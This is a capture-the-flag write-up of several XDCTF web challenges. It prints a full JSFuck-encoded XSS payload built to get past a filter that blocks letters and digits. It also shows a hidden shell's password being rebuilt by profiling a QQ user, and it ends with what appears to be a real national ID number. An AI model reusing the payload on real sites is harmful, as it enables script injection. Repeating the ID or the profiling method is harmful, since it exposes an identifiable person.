XDCTF WEB-some
Source: Internet  Editor: 程序博客网  Time: 2024/05/21 16:55
Web-20
Sigh, this challenge left me speechless.
PHP Easter egg
http://game1.xdctf.com:8081/H86Ki4NnCSVv/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
WEB-50:
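At a glance it is a crx; just change the extension to zip.
There is a JSON file.
After Base64 decoding, it turned out to be a trap.
Yep, typical Xidian style.
Found this in the jpg's comment field, then converted it: flag.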
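Renaming works because a crx is a ZIP archive with a signed header in front of it. The following is an added example, not part of the original write-up: it parses that header to find where the ZIP starts and lists the members. The sample file is constructed in memory, and the function names are hypothetical.

```python
import io
import struct
import zipfile

def crx_zip_offset(data: bytes) -> int:
    """Return the offset at which the ZIP archive begins inside a CRX file."""
    if len(data) < 16 or data[:4] != b"Cr24":
        raise ValueError("not a CRX file (missing Cr24 magic)")
    (version,) = struct.unpack_from("<I", data, 4)
    if version == 2:
        # CRX2: magic, version, pubkey length, signature length, pubkey, signature, ZIP
        key_len, sig_len = struct.unpack_from("<II", data, 8)
        offset = 16 + key_len + sig_len
    elif version == 3:
        # CRX3: magic, version, header length, protobuf header, ZIP
        (header_len,) = struct.unpack_from("<I", data, 8)
        offset = 12 + header_len
    else:
        raise ValueError(f"unsupported CRX version {version}")
    # Lengths come from the file itself, so verify them before trusting the offset.
    if data[offset:offset + 4] != b"PK\x03\x04":
        raise ValueError("no ZIP local file header at the computed offset")
    return offset

def read_crx_members(data: bytes) -> dict:
    """Map each archive member name to its bytes, without writing to disk."""
    offset = crx_zip_offset(data)
    with zipfile.ZipFile(io.BytesIO(data[offset:])) as zf:
        return {name: zf.read(name) for name in zf.namelist()}

def build_sample_crx2() -> bytes:
    """Constructed sample: a CRX2 container with dummy key and signature bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("manifest.json", '{"name": "constructed sample", "version": "1.0"}')
    key, sig = b"K" * 8, b"S" * 4  # placeholders, not a real key or signature
    header = b"Cr24" + struct.pack("<III", 2, len(key), len(sig))
    return header + key + sig + buf.getvalue()

if __name__ == "__main__":
    sample = build_sample_crx2()
    print("ZIP starts at byte", crx_zip_offset(sample))
    for name, body in read_crx_members(sample).items():
        print(name, len(body), "bytes")
```

Reading members into memory rather than extracting them keeps an untrusted extension's files off the analysis machine's disk.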
WEB-70
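It is an XSS challenge. I glanced at the source, nothing useful there, so I went to key.php and tested what gets filtered:
Never mind the rest, this thing does not even allow a single letter or digit, damn it!
With no digits or English letters allowed, the only thing I could think of was JSFuck.
I found an alert(1) one, and sure enough it worked: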
[][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]][([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]]+[])[+[[!+[]+!+[]+!+[]]]]+([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]]]+([][[]]+[])[+[[+!+[]]]]+(![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[+!+[]]]]+([][[]]+[])[+[[+[]]]]+([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]]((![]+[])[+[[+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]+(!![]+[])[+[[+[]]]]+([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]]+[])[+[[+!+[]]]+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+[+!+[]]+([][(![]+[])[+[[+[]]]]+([][[]]+[])[+[[!+[]+!+[]+!+[]+!+[]+!+[]]]]+(![]+[])[+[[!+[]+!+[]]]]+(!![]+[])[+[[+[]]]]+(!![]+[])[+[[!+[]+!+[]+!+[]]]]+(!![]+[])[+[[+!+[]]]]]+[])[+[[+!+[]]]+[[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]]])()
WEB-180:
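Download the source and find a hidden shell:
Found a QQ number; look it up:
The credentials can be constructed from this: the username is the nickname, and age 29 means born in 1985. The Chang'an District part was a trap, and in the end we got it by brute force: back in 1985 there was no Chang'an District, it was Chang'an County. Then May 7. There is a number in the remarks that looks like the last four digits of an ID number, and the password in the shell also looks like the last four digits of an ID number =0= but we brute-forced it. Finally: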
gh0st2014
610121198505073895